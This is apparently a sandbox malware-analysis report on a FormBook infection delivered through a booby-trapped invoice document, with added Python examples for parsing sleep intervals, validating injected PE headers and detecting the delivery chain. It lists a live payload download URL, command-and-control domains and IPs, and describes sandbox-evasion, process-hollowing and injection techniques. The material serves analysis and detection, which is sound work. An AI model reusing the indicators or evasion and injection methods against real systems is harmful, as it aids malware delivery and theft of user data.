Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | RDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe | RDTSC instruction interceptor: First address: 00000000000E9904 second address: 00000000000E990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\wininit.exe | RDTSC instruction interceptor: First address: 00000000000E9B6E second address: 00000000000E9B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2632 | Thread sleep time: -240000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2752 | Thread sleep time: -37527s >= -30000s
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2692 | Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 2852 | Thread sleep time: -34000s >= -30000s
Source: C:\Windows\SysWOW64\wininit.exe TID: 2184 | Thread sleep time: -44000s >= -30000s
Source: C:\Windows\SysWOW64\wininit.exe | Last function: Thread delayed (2 identical events)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00409AA0 rdtsc
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Process information queried: ProcessInformation
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Thread delayed: delay time: 37527
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Thread delayed: delay time: 922337203685477
Source: explorer.exe, 00000006.00000000.418732343.000000000457A000.00000004.00000001.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp | Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp | Binary or memory string: vmware
Source: explorer.exe, 00000006.00000000.418732343.000000000457A000.00000004.00000001.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000006.00000000.418716458.000000000456F000.00000004.00000001.sdmp | Binary or memory string: scsi\disk&ven_vmware&prod_virtual_disk\5&22be343f&0&000000
Source: explorer.exe, 00000006.00000000.437383575.00000000044E7000.00000004.00000001.sdmp | Binary or memory string: ide\cdromnecvmwar_vmware_sata_cd01_______________1.00____\6&373888b8&0&1.0.0
Source: explorer.exe, 00000006.00000000.413102418.000000000029B000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000006.00000000.418800523.00000000045D6000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp | Binary or memory string: VMware SVGA II
Source: ibefrankhq4862.exe, 00000004.00000002.412503332.0000000002881000.00000004.00000001.sdmp | Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_00409AA0 rdtsc
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\wininit.exe | Process token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_008726F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wininit.exe | Code function: 7_2_024B26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\wininit.exe | Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Code function: 5_2_0040ACE0 LdrLoadDll
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Memory allocated: page read and write | page guard
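The "Thread sleep time" entries above are per-thread sleep durations compared against the sandbox's 30 s tolerance; the page prints them with an "s" suffix, but the numbers are milliseconds (30000 is the threshold). The value 922337203685477 is what a LARGE_INTEGER of magnitude 2^63 in 100 ns ticks becomes after division to milliseconds: an NtDelayExecution call with the largest possible relative interval (about 29,000 years), which parks the thread until something else resumes it. The Python below is an added example, not part of the report. It parses these lines, converts raw NtDelayExecution intervals the same way, and labels each sleep; the labels and helper names are the example's own.

```python
import re
from datetime import timedelta

INT64_MAX = 2**63 - 1          # largest magnitude a LARGE_INTEGER can carry
HUNDRED_NS_PER_MS = 10_000     # NtDelayExecution intervals are 100-ns ticks


def nt_delay_to_ms(interval):
    """Milliseconds for a relative NtDelayExecution interval.
    Negative values are relative delays in 100-ns units; non-negative values are
    absolute timestamps and cannot be turned into a duration without knowing 'now'."""
    if interval >= 0:
        return None
    return (-interval) // HUNDRED_NS_PER_MS


# Constructed input: the "Thread sleep time" lines of this report as the page renders them.
REPORT_LINES = [
    r"Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2632Thread sleep time: -240000s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2752Thread sleep time: -37527s >= -30000s",
    r"Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe TID: 2692Thread sleep time: -922337203685477s >= -30000s",
    r"Source: C:\Windows\explorer.exe TID: 2852Thread sleep time: -34000s >= -30000s",
    r"Source: C:\Windows\SysWOW64\wininit.exe TID: 2184Thread sleep time: -44000s >= -30000s",
]

LINE_RE = re.compile(
    r"^Source:\s*(?P<image>.+?)\s+TID:\s*(?P<tid>\d+)Thread sleep time:\s*"
    r"(?P<ms>-?\d+)s\s*>=\s*(?P<threshold>-?\d+)s"
)


def classify_sleep(ms, threshold_ms=30_000):
    """Label a sleep duration given in milliseconds (labels are the example's own)."""
    if ms >= INT64_MAX // HUNDRED_NS_PER_MS:
        return "infinite"      # 2^63 ticks: the thread never wakes on its own
    if ms > threshold_ms:
        return "long"          # outlasts the sandbox's default patience
    return "normal"


def parse_sleeps(lines):
    """Return [(image basename, tid, ms, label)] for every line that matches."""
    out = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ms = abs(int(m.group("ms")))                 # the report carries the sign of the raw interval
        threshold = abs(int(m.group("threshold")))
        image = m.group("image").rsplit("\\", 1)[-1]
        out.append((image, int(m.group("tid")), ms, classify_sleep(ms, threshold)))
    return out


if __name__ == "__main__":
    for image, tid, ms, label in parse_sleeps(REPORT_LINES):
        print(f"{image:22} tid={tid:<5} {str(timedelta(milliseconds=ms)):>24} {label}")
```

Note that four of the five threads are merely "long" (34 to 240 s, enough to outlast a default analysis window), while thread 2692 of ibefrankhq4862.exe is parked indefinitely; that is the thread the loader abandons after handing execution to the injected code.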

          HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.urbantennis.info
Source: C:\Windows\explorer.exe | Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe | Domain query: www.lazyguysmarketing.com
Sample uses process hollowing technique
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Section unmapped: C:\Windows\SysWOW64\wininit.exe base address: 5B0000
Maps a DLL or memory area into another process
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Section loaded: unknown target: C:\Windows\SysWOW64\wininit.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\wininit.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\wininit.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Injects a PE file into a foreign process
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Memory written: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe base: 400000 value starts with: 4D5A
Queues an APC in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Thread register set: target process: 1764
Source: C:\Windows\SysWOW64\wininit.exe | Thread register set: target process: 1764
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Process created: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe C:\Users\user\AppData\Roaming\ibefrankhq4862.exe
Source: C:\Windows\SysWOW64\wininit.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\ibefrankhq4862.exe'
Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.489109171.0000000000255000.00000004.00000020.sdmp | Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmp | Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.489292845.0000000000750000.00000002.00020000.sdmp, wininit.exe, 00000007.00000002.668793907.0000000000B00000.00000002.00020000.sdmp | Binary or memory string: Program Manager<
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Queries volume information: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
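The hollowing and PE-injection hits above rest on two observations: a cross-process write whose first bytes are 4D 5A ("MZ") at address 0x400000, and NtUnmapViewOfSection applied to wininit.exe's own image at 0x5B0000 before the replacement is written. The following Python is an added example, not part of the Joe Sandbox report, showing how an analyst can tighten the first observation from "starts with MZ" to "is a well-formed PE image whose preferred ImageBase equals the address it was written to", which is the signature of an image being planted at its own base after the original has been unmapped. The header bytes it tests on are constructed inside the block (header-only, no sections); nothing here is data taken from the sample.

```python
import struct

MACHINES = {0x14C: "I386", 0x8664: "AMD64", 0x1C0: "ARM", 0xAA64: "ARM64"}
IMAGE_FILE_DLL = 0x2000


def parse_pe_header(buf):
    """Validate a buffer that 'starts with 4D5A' as a real PE image.
    Returns the header facts an analyst wants, or None if it is not a well-formed PE."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", buf, 0x3C)[0]
    if e_lfanew + 24 > len(buf) or buf[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    # IMAGE_FILE_HEADER: Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable,
    # NumberOfSymbols, SizeOfOptionalHeader, Characteristics (20 bytes)
    machine, nsections, _, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", buf, e_lfanew + 4)
    opt = e_lfanew + 24
    if opt_size < 32 or opt + opt_size > len(buf):
        return None
    magic = struct.unpack_from("<H", buf, opt)[0]
    entry = struct.unpack_from("<I", buf, opt + 16)[0]        # AddressOfEntryPoint, same offset in both formats
    if magic == 0x10B:                                         # PE32: ImageBase is a DWORD at offset 28
        image_base = struct.unpack_from("<I", buf, opt + 28)[0]
    elif magic == 0x20B:                                       # PE32+: ImageBase is a QWORD at offset 24
        image_base = struct.unpack_from("<Q", buf, opt + 24)[0]
    else:
        return None
    return {
        "machine": machine,
        "machine_name": MACHINES.get(machine, hex(machine)),
        "sections": nsections,
        "entry_point": entry,
        "image_base": image_base,
        "is_dll": bool(chars & IMAGE_FILE_DLL),
        "pe32plus": magic == 0x20B,
    }


def assess_write(write_base, data):
    """Decide whether a cross-process memory write looks like an image planted at its
    preferred base, which is what a hollowing loader does after NtUnmapViewOfSection."""
    info = parse_pe_header(data)
    if info is None:
        return None
    info["write_base"] = write_base
    info["at_preferred_base"] = (write_base == info["image_base"])
    return info


def build_minimal_pe(image_base=0x400000, entry=0x1000, plus=False):
    """Constructed header-only PE used as test input (not bytes from the sample)."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    opt_size = 240 if plus else 224
    coff = struct.pack("<HHIIIHH", 0x8664 if plus else 0x14C, 1, 0, 0, 0, opt_size, 0x0102)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B if plus else 0x10B)
    struct.pack_into("<I", opt, 16, entry)
    if plus:
        struct.pack_into("<Q", opt, 24, image_base)
    else:
        struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, 0x20000)                 # SizeOfImage, same offset in both formats
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt)


if __name__ == "__main__":
    # Mirrors the report's observation: a write to base 0x400000 whose value starts with 4D5A.
    print(assess_write(0x400000, build_minimal_pe()))
```

The check is deliberately stricter than the sandbox's: a buffer that begins with MZ but has no "PE\0\0" at e_lfanew, or whose optional header is truncated, is rejected, and a genuine image written somewhere other than its ImageBase is reported with at_preferred_base set to False, which usually means a manual mapper with relocation handling rather than classic hollowing.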

          Stealing of Sensitive Information:

Yara detected FormBook
Source: Yara match | File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

          Remote Access Functionality:

Yara detected FormBook
Source: Yara match | File source: 5.2.ibefrankhq4862.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.668455466.00000000000E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668481773.0000000000190000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.432636146.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.668622476.0000000000390000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.440641863.00000000097DD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448708427.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448554657.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.448662852.0000000000380000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.413292643.0000000003881000.00000004.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Techniques are listed per tactic column. Digits following a technique name are the report's signature-match badges; entries without digits are the unpopulated matrix template.

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: Shared Modules 1; Exploitation for Client Execution 13; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: Path Interception; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection 612; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Rootkit 1; Masquerading 1; Disable or Modify Tools 1; Virtualization/Sandbox Evasion 31; Process Injection 612; Deobfuscate/Decode Files or Information 1; Obfuscated Files or Information 4; Software Packing 12
Credential Access: Credential API Hooking 1; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery 321; Process Discovery 2; Virtualization/Sandbox Evasion 31; Remote System Discovery 1; File and Directory Discovery 1; System Information Discovery 113; Network Sniffing; Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Credential API Hooking 1; Archive Collected Data 1; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel 1; Ingress Tool Transfer 12; Non-Application Layer Protocol 2; Application Layer Protocol 122; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue

          Behavior Graph

          Behavior Graph ID: 491373; Sample: Proforma invoice.doc; Start date: 27/09/2021; Architecture: WINDOWS; Score: 100

          Process tree and network activity as drawn in the graph (node numbers are the graph's own; badge counts are copied as rendered and, per the graph legend, count created registry values and files):

          Sample root (node 2)
            DNS/IP: www.visionandcourage.com; td-balancer-euw2-6-109.wixdns.net; 3 other IPs or domains
            Signatures: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
            Started: EQNEDT32.EXE (node 11, badge 11); WINWORD.EXE (node 16, badges 291 23)

          EQNEDT32.EXE (node 11)
            DNS/IP: fantecheo.tk 185.239.243.112, local port 49165 -> remote port 80, CLOUDIE-AS-APCloudieLimitedHK, Moldova Republic of
            Dropped files: C:\Users\user\AppData\...\ibefrankhq4862.exe (PE32); C:\Users\user\AppData\...\ibefrankzx[1].exe (PE32)
            Signatures: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
            Started: ibefrankhq4862.exe (node 18, badges 1 5)

          ibefrankhq4862.exe (node 18)
            Signatures: Multi AV Scanner detection for dropped file; Tries to detect virtualization through RDTSC time measurements; Injects a PE file into a foreign processes
            Started: ibefrankhq4862.exe (node 21)

          ibefrankhq4862.exe (node 21)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Sample uses process hollowing technique; Queues an APC in another process (thread injection)
            Injected into: explorer.exe (node 24)

          explorer.exe (node 24, injected)
            DNS/IP: www.urbantennis.info; www.lazyguysmarketing.com; lazyguysmarketing.com 34.98.99.30, local port 49166 -> remote port 80, GOOGLEUS, United States
            Signatures: System process connects to network (likely due to code injection or exploit)
            Started: wininit.exe (node 28)

          wininit.exe (node 28)
            Signatures: Modifies the context of a thread in another process (thread injection); Maps a DLL or memory area into another process; Tries to detect virtualization through RDTSC time measurements
            Started: cmd.exe (node 31)
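The chain in the behavior graph above (EQNEDT32.EXE reaching fantecheo.tk, writing ibefrankhq4862.exe under AppData, spawning it, and the injected explorer.exe then talking to 34.98.99.30) is exactly what the report's Sigma signatures key on. The following is an added example, not part of the Joe Sandbox report or its rule set: the same four checks written as plain Python over constructed Sysmon-style events. Field names follow Sysmon; the file paths, the internal-host event and the event layout are assumptions made for the example. The system-process rule is scoped to public destination addresses, and in production it still needs tuning, since explorer.exe does make legitimate outbound connections (the MSN and media.net strings in its memory dump later in this report are normal shell content).

```python
"""Detection logic for the Equation Editor delivery chain drawn in the behavior graph.

Added example: the rules and the telemetry below are this example's own, not
part of the Joe Sandbox report. Events are constructed Sysmon-style records
(EventID 1 = process create, 3 = network connect, 11 = file create) whose
values mirror the report's process tree; hostnames and IPs come from the report,
everything else (paths, the internal-host event, the field layout) is made up.
"""
import ipaddress
from typing import Dict, Iterable, List

EQNEDT32 = "eqnedt32.exe"
# Windows processes that should not be initiating internet connections themselves.
SYSTEM_PROCESSES = {"explorer.exe", "wininit.exe", "winlogon.exe", "lsass.exe", "services.exe"}
EXECUTABLE_EXTENSIONS = (".exe", ".dll", ".scr", ".com", ".pif")

# Constructed sample telemetry modelled on the report's behavior graph.
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"WINWORD.EXE" "C:\Users\user\Desktop\Proforma invoice.doc"'},
    {"EventID": 3, "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "DestinationIp": "185.239.243.112", "DestinationPort": 80, "DestinationHostname": "fantecheo.tk"},
    {"EventID": 11, "Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "TargetFilename": r"C:\Users\user\AppData\Roaming\ibefrankhq4862.exe"},
    {"EventID": 1, "Image": r"C:\Users\user\AppData\Roaming\ibefrankhq4862.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r"C:\Users\user\AppData\Roaming\ibefrankhq4862.exe"},
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "34.98.99.30", "DestinationPort": 80, "DestinationHostname": "www.lazyguysmarketing.com"},
    # Benign noise (constructed): Word reaching an internal file server must not alert.
    {"EventID": 3, "Image": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445, "DestinationHostname": "fileserver"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path (tolerates forward slashes)."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def is_public(ip: str) -> bool:
    """True for globally routable addresses; private/loopback/link-local are excluded."""
    try:
        return ipaddress.ip_address(ip).is_global
    except ValueError:
        return False


def detect(events: Iterable[Dict]) -> List[Dict]:
    """Run the four chain rules over Sysmon-style events and return one alert per hit."""
    alerts: List[Dict] = []
    for ev in events:
        eid = ev.get("EventID")
        image = basename(ev.get("Image", ""))
        parent = basename(ev.get("ParentImage", ""))
        dest = str(ev.get("DestinationIp", ""))
        if eid == 1 and parent == EQNEDT32:
            # Equation Editor has no business starting processes at all.
            alerts.append({"rule": "eqnedt32_child_process", "image": image,
                           "detail": ev.get("CommandLine", "")})
        elif eid == 3 and image == EQNEDT32:
            alerts.append({"rule": "eqnedt32_network_connection", "image": image,
                           "detail": f"{dest}:{ev.get('DestinationPort')}"})
        elif eid == 3 and image in SYSTEM_PROCESSES and is_public(dest):
            # A shell/system binary reaching the internet is the injection tell-tale.
            alerts.append({"rule": "system_process_network_connection", "image": image,
                           "detail": f"{dest}:{ev.get('DestinationPort')}"})
        elif eid == 11 and image == EQNEDT32 and \
                basename(ev.get("TargetFilename", "")).endswith(EXECUTABLE_EXTENSIONS):
            alerts.append({"rule": "eqnedt32_file_drop", "image": image,
                           "detail": ev.get("TargetFilename", "")})
    return alerts


def triggered_rules(events: Iterable[Dict]) -> List[str]:
    """Sorted, de-duplicated rule names that fired for the given events."""
    return sorted({a["rule"] for a in detect(events)})


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(f"{alert['rule']:36} {alert['image']:22} {alert['detail']}")
```

Run as a script it prints the four alerts in the order the events arrive; the Word-to-file-server event produces nothing. Pointing `detect()` at real Sysmon JSON only requires mapping the field names, which were kept identical to Sysmon's for that reason.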


          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          Source | Detection | Scanner | Label
          Proforma invoice.doc | 27% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

          Dropped Files

          Source | Detection | Scanner | Label
          C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\ibefrankzx[1].exe | 13% | ReversingLabs | Win32.Trojan.Generic
          C:\Users\user\AppData\Roaming\ibefrankhq4862.exe | 13% | ReversingLabs | Win32.Trojan.Generic

          Unpacked PE Files

          Source | Detection | Scanner | Label
          5.2.ibefrankhq4862.exe.400000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

          Domains

          No Antivirus matches

          URLs

          Source | Detection | Scanner | Label
          http://wellformedweb.org/CommentAPI/ | 0% | URL Reputation | safe
          http://www.rspb.org.uk/wildlife/birdguide/name/ | 0% | Avira URL Cloud | safe
          http://www.iis.fhg.de/audioPA | 0% | URL Reputation | safe
          www.handelsbetriebposavec.com/if60/ | 0% | Avira URL Cloud | safe
          http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
          http://treyresearch.net | 0% | URL Reputation | safe
          http://java.sun.com | 0% | Avira URL Cloud | safe
          http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
          http://computername/printers/printername/.printer | 0% | Avira URL Cloud | safe
          http://www.%s.comPA | 0% | URL Reputation | safe
          http://www.lazyguysmarketing.com/if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz | 0% | Avira URL Cloud | safe
          http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
          http://fantecheo.tk/ibefrankzx.exe | 100% | Avira URL Cloud | malware

          Domains and IPs

          Contacted Domains

          Name | IP | Active | Malicious | Antivirus Detection | Reputation
          td-balancer-euw2-6-109.wixdns.net | 35.246.6.109 | true | true | - | unknown
          lazyguysmarketing.com | 34.98.99.30 | true | false | - | unknown
          fantecheo.tk | 185.239.243.112 | true | true | - | unknown
          www.urbantennis.info | unknown | unknown | true | - | unknown
          www.visionandcourage.com | unknown | unknown | true | - | unknown
          www.lazyguysmarketing.com | unknown | unknown | true | - | unknown

          Contacted URLs

          Name | Malicious | Antivirus Detection | Reputation
          www.handelsbetriebposavec.com/if60/ | true | Avira URL Cloud: safe | low
          http://www.lazyguysmarketing.com/if60/?L0Gd9F=rhh0xc6OYmH3Bp2G4X501Z0vOdzBEjh/MlQjf2DAfTSCIAGZoC8T5uMa8yxQ1kiGUtDxZg==&fDKt=ndxXaN5XDzkTz | false | Avira URL Cloud: safe | unknown
          http://fantecheo.tk/ibefrankzx.exe | true | Avira URL Cloud: malware | unknown

                      URLs from Memory and Binaries

          Name | Source | Malicious | Antivirus Detection | Reputation
          http://www.windows.com/pctv. | explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | false | - | high
          http://investor.msn.com | explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | false | - | high
          http://www.msnbc.com/news/ticker.txt | explorer.exe, 00000006.00000000.416645751.0000000002AE0000.00000002.00020000.sdmp | false | - | high
          http://wellformedweb.org/CommentAPI/ | explorer.exe, 00000006.00000000.427412095.0000000004650000.00000002.00020000.sdmp | false | URL Reputation: safe | unknown
          http://www.rspb.org.uk/wildlife/birdguide/name/ | ibefrankhq4862.exe, ibefrankhq4862.exe, 00000005.00000002.449302089.00000000013A2000.00000020.00020000.sdmp, wininit.exe, 00000007.00000002.668531899.00000000002B0000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
